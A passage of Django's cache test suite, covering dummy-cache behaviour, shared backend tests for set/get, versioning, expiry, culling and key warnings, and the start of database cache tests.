        cache.set("stuff", stuff)
        self.assertIsNone(cache.get("stuff"))

    def test_expiration(self):
        "Expiration has no effect on the dummy cache"
        cache.set('expire1', 'very quickly', 1)
        cache.set('expire2', 'very quickly', 1)
        cache.set('expire3', 'very quickly', 1)
        time.sleep(2)
        self.assertIsNone(cache.get("expire1"))
        cache.add("expire2", "newvalue")
        self.assertIsNone(cache.get("expire2"))
        self.assertFalse(cache.has_key("expire3"))

    def test_unicode(self):
        "Unicode values are ignored by the dummy cache"
        stuff = {
            'ascii': 'ascii_value',
            'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
            'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
            'ascii2': {'x': 1}
        }
        for (key, value) in stuff.items():
            cache.set(key, value)
            self.assertIsNone(cache.get(key))

    def test_set_many(self):
        "set_many does nothing for the dummy cache backend"
        cache.set_many({'a': 1, 'b': 2})
        cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')

    def test_delete_many(self):
        "delete_many does nothing for the dummy cache backend"
        cache.delete_many(['a', 'b'])

    def test_clear(self):
        "clear does nothing for the dummy cache backend"
        cache.clear()

    def test_incr_version(self):
        "Dummy cache versions can't be incremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.incr_version, 'answer')
        self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')

    def test_decr_version(self):
        "Dummy cache versions can't be decremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.decr_version, 'answer')
        self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')

    def test_get_or_set(self):
        # No stored value can ever be found, so the default is returned.
        self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')

    def test_get_or_set_callable(self):
        # Callable defaults are invoked and their result returned.
        def my_callable():
            return 'default'

        self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
def custom_key_func(key, key_prefix, version):
    "A customized cache key function"
    # Equivalent to 'CUSTOM-' + '-'.join([key_prefix, str(version), key]).
    return '-'.join(['CUSTOM', key_prefix, str(version), key])
# Per-alias base configuration for the test CACHES setting; combined with
# a concrete backend config by caches_setting_for_tests().
_caches_setting_base = {
    'default': {},
    # os.getpid() makes the prefix unique per test process.
    'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
    'v2': {'VERSION': 2},
    'custom_key': {'KEY_FUNCTION': custom_key_func},
    'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
    'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
    'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
    """Build a CACHES setting dict covering every test alias.

    ``base`` pulls in the backend config from the original settings (e.g.
    the memcached location), ``params`` are test-specific overrides and
    ``_caches_setting_base`` is the per-alias base config for the tests.
    Effective precedence: params -> _caches_setting_base -> base.
    """
    base = base or {}
    # Each alias gets its own copy of `base` so the per-alias updates
    # below cannot leak into sibling aliases.
    setting = {k: base.copy() for k in _caches_setting_base}
    for key, cache_params in setting.items():
        cache_params.update(_caches_setting_base[key])
        cache_params.update(params)
    return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
    # Fresh request factory for the cache decorator/middleware tests.
    self.factory = RequestFactory()
def tearDown(self):
    # Empty the shared default cache so tests stay independent.
    cache.clear()
def test_simple(self):
    """A value stored with set() comes back from get()."""
    # Simple cache set/get works
    cache.set("key", "value")
    self.assertEqual(cache.get("key"), "value")
def test_add(self):
    """add() stores only when the key is absent, and reports whether it did."""
    # A key can be added to a cache
    cache.add("addkey1", "value")
    result = cache.add("addkey1", "newvalue")
    self.assertFalse(result)
    self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
    """KEY_PREFIX isolates aliases that share the same physical backend."""
    # Test for same cache key conflicts between shared backend
    cache.set('somekey', 'value')
    # should not be set in the prefixed cache
    self.assertFalse(caches['prefix'].has_key('somekey'))
    caches['prefix'].set('somekey', 'value2')
    self.assertEqual(cache.get('somekey'), 'value')
    self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
    """Missing keys yield None, or the caller-supplied default."""
    # Non-existent cache keys return as None/default
    # get with non-existent keys
    self.assertIsNone(cache.get("does_not_exist"))
    self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
    """get_many() returns only the requested keys that actually exist."""
    # Multiple cache keys can be returned using get_many
    cache.set('a', 'a')
    cache.set('b', 'b')
    cache.set('c', 'c')
    cache.set('d', 'd')
    self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
    self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
    """delete() removes exactly the named key and nothing else."""
    # Cache keys can be deleted
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    self.assertEqual(cache.get("key1"), "spam")
    cache.delete("key1")
    self.assertIsNone(cache.get("key1"))
    self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
    """has_key() reflects key presence, including keys cached forever."""
    # The cache can be inspected for cache keys
    cache.set("hello1", "goodbye1")
    self.assertTrue(cache.has_key("hello1"))
    self.assertFalse(cache.has_key("goodbye1"))
    cache.set("no_expiry", "here", None)  # timeout=None: cached forever
    self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
    """`key in cache` mirrors has_key()."""
    # The in operator can be used to inspect cache contents
    cache.set("hello2", "goodbye2")
    self.assertIn("hello2", cache)
    self.assertNotIn("goodbye2", cache)
def test_incr(self):
    """incr() adds a (possibly negative) delta; missing keys raise ValueError."""
    # Cache values can be incremented
    cache.set('answer', 41)
    self.assertEqual(cache.incr('answer'), 42)
    self.assertEqual(cache.get('answer'), 42)
    self.assertEqual(cache.incr('answer', 10), 52)
    self.assertEqual(cache.get('answer'), 52)
    self.assertEqual(cache.incr('answer', -10), 42)
    self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
    """decr() subtracts a (possibly negative) delta; missing keys raise ValueError."""
    # Cache values can be decremented
    cache.set('answer', 43)
    self.assertEqual(cache.decr('answer'), 42)
    self.assertEqual(cache.get('answer'), 42)
    self.assertEqual(cache.decr('answer', 10), 32)
    self.assertEqual(cache.get('answer'), 32)
    self.assertEqual(cache.decr('answer', -10), 42)
    self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
    """Every backend exposes a callable close() hook."""
    self.assertTrue(hasattr(cache, 'close'))
    cache.close()
def test_data_types(self):
    """Many different (picklable) Python data types round-trip intact."""
    payload = {
        'string': 'this is a string',
        'int': 42,
        'list': [1, 2, 3, 4],
        'tuple': (1, 2, 3, 4),
        'dict': {'A': 1, 'B': 2},
        'function': f,
        'class': C,
    }
    cache.set("stuff", payload)
    self.assertEqual(cache.get("stuff"), payload)
def test_cache_read_for_model_instance(self):
    """Reading a cached model instance must not re-run callable field defaults."""
    # Don't want fields with callable as default to be called on cache read
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    my_poll = Poll.objects.create(question="Well?")
    self.assertEqual(Poll.objects.count(), 1)
    pub_date = my_poll.pub_date
    cache.set('question', my_poll)
    cached_poll = cache.get('question')
    self.assertEqual(cached_poll.pub_date, pub_date)
    # We only want the default expensive calculation run once
    self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
    """Caching a queryset with deferred fields must not trigger field defaults."""
    # Don't want fields with callable as default to be called on cache write
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    Poll.objects.create(question="What?")
    self.assertEqual(expensive_calculation.num_runs, 1)
    defer_qs = Poll.objects.all().defer('question')
    self.assertEqual(defer_qs.count(), 1)
    self.assertEqual(expensive_calculation.num_runs, 1)
    cache.set('deferred_queryset', defer_qs)
    # cache set should not re-evaluate default functions
    self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
    """Reading a cached deferred queryset must not trigger field defaults."""
    # Don't want fields with callable as default to be called on cache read
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    Poll.objects.create(question="What?")
    self.assertEqual(expensive_calculation.num_runs, 1)
    defer_qs = Poll.objects.all().defer('question')
    self.assertEqual(defer_qs.count(), 1)
    cache.set('deferred_queryset', defer_qs)
    self.assertEqual(expensive_calculation.num_runs, 1)
    runs_before_cache_read = expensive_calculation.num_runs
    cache.get('deferred_queryset')
    # We only want the default expensive calculation run on creation and set
    self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
    """Expired keys disappear and can then be re-added."""
    # Cache values can be set to expire
    cache.set('expire1', 'very quickly', 1)
    cache.set('expire2', 'very quickly', 1)
    cache.set('expire3', 'very quickly', 1)
    time.sleep(2)
    self.assertIsNone(cache.get("expire1"))
    # After expiry, add() succeeds because the key is effectively gone.
    cache.add("expire2", "newvalue")
    self.assertEqual(cache.get("expire2"), "newvalue")
    self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
    """Unicode keys and values round-trip via set, add and set_many."""
    samples = {
        'ascii': 'ascii_value',
        'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
        'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
        'ascii2': {'x': 1}
    }
    # Test `set`
    for key, value in samples.items():
        cache.set(key, value)
        self.assertEqual(cache.get(key), value)
    # Test `add`
    for key, value in samples.items():
        cache.delete(key)
        cache.add(key, value)
        self.assertEqual(cache.get(key), value)
    # Test `set_many`
    for key in samples:
        cache.delete(key)
    cache.set_many(samples)
    for key, value in samples.items():
        self.assertEqual(cache.get(key), value)
def test_binary_string(self):
    """Binary (zlib-compressed) values survive set, add and set_many."""
    from zlib import compress, decompress
    original = 'value_to_be_compressed'
    blob = compress(original.encode())
    # Test set
    cache.set('binary1', blob)
    fetched = cache.get('binary1')
    self.assertEqual(blob, fetched)
    self.assertEqual(original, decompress(fetched).decode())
    # Test add
    cache.add('binary1-add', blob)
    fetched = cache.get('binary1-add')
    self.assertEqual(blob, fetched)
    self.assertEqual(original, decompress(fetched).decode())
    # Test set_many
    cache.set_many({'binary1-set_many': blob})
    fetched = cache.get('binary1-set_many')
    self.assertEqual(blob, fetched)
    self.assertEqual(original, decompress(fetched).decode())
def test_set_many(self):
    """set_many() stores every key/value pair it is given."""
    # Multiple keys can be set using set_many
    cache.set_many({"key1": "spam", "key2": "eggs"})
    self.assertEqual(cache.get("key1"), "spam")
    self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
    """set_many() honours its shared timeout argument for all keys."""
    # set_many takes a second ``timeout`` parameter
    cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
    time.sleep(2)
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
    """delete_many() removes only the listed keys."""
    # Multiple keys can be deleted using delete_many
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    cache.set("key3", "ham")
    cache.delete_many(["key1", "key2"])
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
    self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
    """clear() empties the cache entirely."""
    # The cache can be emptied using clear
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    cache.clear()
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
    '''
    Using a timeout greater than 30 days makes memcached think
    it is an absolute expiration timestamp instead of a relative
    offset. Test that we honour this convention. Refs #12399.
    '''
    cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1)  # 30 days + 1 second
    self.assertEqual(cache.get('key1'), 'eggs')
    cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
    self.assertEqual(cache.get('key2'), 'ham')
    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
    self.assertEqual(cache.get('key3'), 'sausage')
    self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
    '''
    Passing in None into timeout results in a value that is cached forever
    '''
    cache.set('key1', 'eggs', None)
    self.assertEqual(cache.get('key1'), 'eggs')
    cache.add('key2', 'ham', None)
    self.assertEqual(cache.get('key2'), 'ham')
    # add() against an existing forever-cached key must not overwrite it.
    added = cache.add('key1', 'new eggs', None)
    self.assertEqual(added, False)
    self.assertEqual(cache.get('key1'), 'eggs')
    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
    self.assertEqual(cache.get('key3'), 'sausage')
    self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
    '''
    Passing in zero into timeout results in a value that is not cached
    '''
    cache.set('key1', 'eggs', 0)
    self.assertIsNone(cache.get('key1'))
    cache.add('key2', 'ham', 0)
    self.assertIsNone(cache.get('key2'))
    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
    self.assertIsNone(cache.get('key3'))
    self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
    """Float timeouts are accepted."""
    # Make sure a timeout given as a float doesn't crash anything.
    cache.set("key1", "spam", 100.2)
    self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
    """Overflow `cull_cache` with keys, then assert how many survived."""
    # Create initial cache key entries. This will overflow the cache,
    # causing a cull.
    for i in range(1, initial_count):
        cull_cache.set('cull%d' % i, 'value', 1000)
    # Count how many keys are left in the cache.
    survivors = sum(
        1 for i in range(1, initial_count)
        if cull_cache.has_key('cull%d' % i)
    )
    self.assertEqual(survivors, final_count)
def test_cull(self):
    # 'cull' alias (MAX_ENTRIES=30): 29 of the 49 inserted keys survive.
    self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
    # 'zero_cull' alias (CULL_FREQUENCY=0): 19 keys remain after overflow.
    self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
    """
    All the builtin backends (except memcached, see below) should warn on
    keys that would be refused by memcached. This encourages portable
    caching code without making it too difficult to use production backends
    with more liberal key rules. Refs #6447.
    """
    # Install a pass-through ``make_key``: the default key function would
    # never produce the problematic raw keys that trigger the warnings.
    def passthrough(key, *args):
        return key

    previous_key_func = cache.key_func
    cache.key_func = passthrough

    try:
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            # memcached does not allow whitespace or control characters in keys
            cache.set('key with spaces', 'value')
            self.assertEqual(len(w), 2)
            self.assertIsInstance(w[0].message, CacheKeyWarning)

        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            # memcached limits key length to 250
            cache.set('a' * 251, 'value')
            self.assertEqual(len(w), 1)
            self.assertIsInstance(w[0].message, CacheKeyWarning)
    finally:
        cache.key_func = previous_key_func
def test_cache_versioning_get_set(self):
    """get()/set() honour both the per-call `version` and the alias default VERSION."""
    # set, using default version = 1
    cache.set('answer1', 42)
    self.assertEqual(cache.get('answer1'), 42)
    self.assertEqual(cache.get('answer1', version=1), 42)
    self.assertIsNone(cache.get('answer1', version=2))
    self.assertIsNone(caches['v2'].get('answer1'))
    self.assertEqual(caches['v2'].get('answer1', version=1), 42)
    self.assertIsNone(caches['v2'].get('answer1', version=2))
    # set, default version = 1, but manually override version = 2
    cache.set('answer2', 42, version=2)
    self.assertIsNone(cache.get('answer2'))
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)
    self.assertEqual(caches['v2'].get('answer2'), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=1))
    self.assertEqual(caches['v2'].get('answer2', version=2), 42)
    # v2 set, using default version = 2
    caches['v2'].set('answer3', 42)
    self.assertIsNone(cache.get('answer3'))
    self.assertIsNone(cache.get('answer3', version=1))
    self.assertEqual(cache.get('answer3', version=2), 42)
    self.assertEqual(caches['v2'].get('answer3'), 42)
    self.assertIsNone(caches['v2'].get('answer3', version=1))
    self.assertEqual(caches['v2'].get('answer3', version=2), 42)
    # v2 set, default version = 2, but manually override version = 1
    caches['v2'].set('answer4', 42, version=1)
    self.assertEqual(cache.get('answer4'), 42)
    self.assertEqual(cache.get('answer4', version=1), 42)
    self.assertIsNone(cache.get('answer4', version=2))
    self.assertIsNone(caches['v2'].get('answer4'))
    self.assertEqual(caches['v2'].get('answer4', version=1), 42)
    self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
    """add() is a no-op only for the specific version that already exists."""
    # add, default version = 1, but manually override version = 2
    cache.add('answer1', 42, version=2)
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.add('answer1', 37, version=2)
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.add('answer1', 37, version=1)
    self.assertEqual(cache.get('answer1', version=1), 37)
    self.assertEqual(cache.get('answer1', version=2), 42)
    # v2 add, using default version = 2
    caches['v2'].add('answer2', 42)
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)
    caches['v2'].add('answer2', 37)
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)
    caches['v2'].add('answer2', 37, version=1)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 42)
    # v2 add, default version = 2, but manually override version = 1
    caches['v2'].add('answer3', 42, version=1)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertIsNone(cache.get('answer3', version=2))
    caches['v2'].add('answer3', 37, version=1)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertIsNone(cache.get('answer3', version=2))
    caches['v2'].add('answer3', 37)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
    """has_key() is version-aware, like get()."""
    cache.set('answer1', 42)
    # has_key
    self.assertTrue(cache.has_key('answer1'))
    self.assertTrue(cache.has_key('answer1', version=1))
    self.assertFalse(cache.has_key('answer1', version=2))
    self.assertFalse(caches['v2'].has_key('answer1'))
    self.assertTrue(caches['v2'].has_key('answer1', version=1))
    self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
    """delete() removes only the addressed version of a key."""
    cache.set('answer1', 37, version=1)
    cache.set('answer1', 42, version=2)
    cache.delete('answer1')
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.set('answer2', 37, version=1)
    cache.set('answer2', 42, version=2)
    cache.delete('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertIsNone(cache.get('answer2', version=2))
    cache.set('answer3', 37, version=1)
    cache.set('answer3', 42, version=2)
    caches['v2'].delete('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertIsNone(cache.get('answer3', version=2))
    cache.set('answer4', 37, version=1)
    cache.set('answer4', 42, version=2)
    caches['v2'].delete('answer4', version=1)
    self.assertIsNone(cache.get('answer4', version=1))
    self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
    """incr()/decr() touch only the addressed version of a key."""
    cache.set('answer1', 37, version=1)
    cache.set('answer1', 42, version=2)
    cache.incr('answer1')
    self.assertEqual(cache.get('answer1', version=1), 38)
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.decr('answer1')
    self.assertEqual(cache.get('answer1', version=1), 37)
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.set('answer2', 37, version=1)
    cache.set('answer2', 42, version=2)
    cache.incr('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 43)
    cache.decr('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 42)
    cache.set('answer3', 37, version=1)
    cache.set('answer3', 42, version=2)
    caches['v2'].incr('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertEqual(cache.get('answer3', version=2), 43)
    caches['v2'].decr('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertEqual(cache.get('answer3', version=2), 42)
    cache.set('answer4', 37, version=1)
    cache.set('answer4', 42, version=2)
    caches['v2'].incr('answer4', version=1)
    self.assertEqual(cache.get('answer4', version=1), 38)
    self.assertEqual(cache.get('answer4', version=2), 42)
    caches['v2'].decr('answer4', version=1)
    self.assertEqual(cache.get('answer4', version=1), 37)
    self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
    """set_many()/get_many() honor both the cache's default version and
    an explicit ``version`` argument, keeping versions isolated."""
    # set, using default version = 1
    cache.set_many({'ford1': 37, 'arthur1': 42})
    self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
                         {'ford1': 37, 'arthur1': 42})
    self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
                         {'ford1': 37, 'arthur1': 42})
    self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
    self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
    self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
                         {'ford1': 37, 'arthur1': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
    # set, default version = 1, but manually override version = 2
    cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
    self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
    self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
    self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
                         {'ford2': 37, 'arthur2': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
                         {'ford2': 37, 'arthur2': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
    self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
                         {'ford2': 37, 'arthur2': 42})
    # v2 set, using default version = 2
    caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
    self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
    self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
    self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
                         {'ford3': 37, 'arthur3': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
                         {'ford3': 37, 'arthur3': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
    self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
                         {'ford3': 37, 'arthur3': 42})
    # v2 set, default version = 2, but manually override version = 1
    caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
    self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
                         {'ford4': 37, 'arthur4': 42})
    self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
                         {'ford4': 37, 'arthur4': 42})
    self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
    self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
    self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
                         {'ford4': 37, 'arthur4': 42})
    self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
    """incr_version() moves a key from version N to N+1, returns the new
    version number, and raises ValueError for a missing key."""
    cache.set('answer', 42, version=2)
    self.assertIsNone(cache.get('answer'))
    self.assertIsNone(cache.get('answer', version=1))
    self.assertEqual(cache.get('answer', version=2), 42)
    self.assertIsNone(cache.get('answer', version=3))
    self.assertEqual(cache.incr_version('answer', version=2), 3)
    # The value now exists only at version 3.
    self.assertIsNone(cache.get('answer'))
    self.assertIsNone(cache.get('answer', version=1))
    self.assertIsNone(cache.get('answer', version=2))
    self.assertEqual(cache.get('answer', version=3), 42)
    # Same behavior on the 'v2' cache, whose default version is 2.
    caches['v2'].set('answer2', 42)
    self.assertEqual(caches['v2'].get('answer2'), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=1))
    self.assertEqual(caches['v2'].get('answer2', version=2), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=3))
    self.assertEqual(caches['v2'].incr_version('answer2'), 3)
    self.assertIsNone(caches['v2'].get('answer2'))
    self.assertIsNone(caches['v2'].get('answer2', version=1))
    self.assertIsNone(caches['v2'].get('answer2', version=2))
    self.assertEqual(caches['v2'].get('answer2', version=3), 42)
    self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
    """decr_version() moves a key from version N to N-1, returns the new
    version number, and raises ValueError for a missing key."""
    cache.set('answer', 42, version=2)
    self.assertIsNone(cache.get('answer'))
    self.assertIsNone(cache.get('answer', version=1))
    self.assertEqual(cache.get('answer', version=2), 42)
    self.assertEqual(cache.decr_version('answer', version=2), 1)
    # The value now exists only at version 1 (the default).
    self.assertEqual(cache.get('answer'), 42)
    self.assertEqual(cache.get('answer', version=1), 42)
    self.assertIsNone(cache.get('answer', version=2))
    # Same behavior on the 'v2' cache, whose default version is 2.
    caches['v2'].set('answer2', 42)
    self.assertEqual(caches['v2'].get('answer2'), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=1))
    self.assertEqual(caches['v2'].get('answer2', version=2), 42)
    self.assertEqual(caches['v2'].decr_version('answer2'), 1)
    self.assertIsNone(caches['v2'].get('answer2'))
    self.assertEqual(caches['v2'].get('answer2', version=1), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=2))
    self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
    """Caches with different key functions are invisible to each other,
    while caches sharing one key function see the same entries."""
    custom = caches['custom_key']
    custom2 = caches['custom_key2']
    # A key written through the default key function is not visible
    # through the custom-key caches.
    cache.set('answer1', 42)
    self.assertEqual(cache.get('answer1'), 42)
    self.assertIsNone(custom.get('answer1'))
    self.assertIsNone(custom2.get('answer1'))
    # And the reverse: a custom-key write is hidden from the default
    # cache, but shared by both caches using the same key function.
    custom.set('answer2', 42)
    self.assertIsNone(cache.get('answer2'))
    self.assertEqual(custom.get('answer2'), 42)
    self.assertEqual(custom2.get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
    # NOTE(review): despite the method name, what's exercised here is a
    # response carrying cookies surviving a cache middleware round trip —
    # presumably a regression test for response objects that once failed
    # to serialize; confirm against the ticket history.
    update_middleware = UpdateCacheMiddleware()
    update_middleware.cache = cache
    fetch_middleware = FetchFromCacheMiddleware()
    fetch_middleware.cache = cache
    request = self.factory.get('/cache/test')
    request._cache_update_cache = True
    # First fetch: nothing has been cached yet.
    get_cache_data = FetchFromCacheMiddleware().process_request(request)
    self.assertIsNone(get_cache_data)
    response = HttpResponse()
    content = 'Testing cookie serialization.'
    response.content = content
    response.set_cookie('foo', 'bar')
    # Store the response, then read it back through the fetch middleware;
    # both content and cookies must survive.
    update_middleware.process_response(request, response)
    get_cache_data = fetch_middleware.process_request(request)
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, content.encode('utf-8'))
    self.assertEqual(get_cache_data.cookies, response.cookies)
    # Re-cache the fetched response itself and read it back once more.
    update_middleware.process_response(request, get_cache_data)
    get_cache_data = fetch_middleware.process_request(request)
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, content.encode('utf-8'))
    self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
    """Caching an unpicklable object via add() raises instead of failing
    silently."""
    self.assertRaises(pickle.PickleError, cache.add, 'unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
    """Caching an unpicklable object via set() raises instead of failing
    silently."""
    self.assertRaises(pickle.PickleError, cache.set, 'unpicklable', Unpicklable())
def test_get_or_set(self):
    """get_or_set() stores the default on a miss and returns the stored
    value thereafter."""
    key = 'projector'
    # Miss: nothing cached under the key yet.
    self.assertIsNone(cache.get(key))
    # The default is both stored and returned.
    self.assertEqual(cache.get_or_set(key, 42), 42)
    self.assertEqual(cache.get(key), 42)
def test_get_or_set_callable(self):
    """A callable default passed to get_or_set() is invoked to produce
    the value on a miss."""
    self.assertEqual(cache.get_or_set('mykey', lambda: 'value'), 'value')
def test_get_or_set_version(self):
    """get_or_set() requires a default value and honors the ``version``
    argument independently per version."""
    cache.get_or_set('brian', 1979, version=2)
    with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
        cache.get_or_set('brian')
    with self.assertRaisesMessage(ValueError, 'You need to specify a value.'):
        cache.get_or_set('brian', version=1)
    # Version 1 is still unset; setting it doesn't disturb version 2.
    self.assertIsNone(cache.get('brian', version=1))
    self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
    self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
    self.assertIsNone(cache.get('brian', version=3))
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.db.DatabaseCache',
    # Spaces are used in the table name to ensure quoting/escaping is working
    LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
    """Run the shared cache test suite against the database backend, plus
    tests specific to the ``createcachetable`` management command."""

    # Restrict installed apps so per-test table setup/teardown stays cheap.
    available_apps = ['cache']

    def setUp(self):
        # The super call needs to happen first for the settings override.
        super(DBCacheTests, self).setUp()
        self.create_table()

    def tearDown(self):
        # The super call needs to happen first because it uses the database.
        super(DBCacheTests, self).tearDown()
        self.drop_table()

    def create_table(self):
        # Creates the cache table named in the LOCATION setting above.
        management.call_command('createcachetable', verbosity=0, interactive=False)

    def drop_table(self):
        with connection.cursor() as cursor:
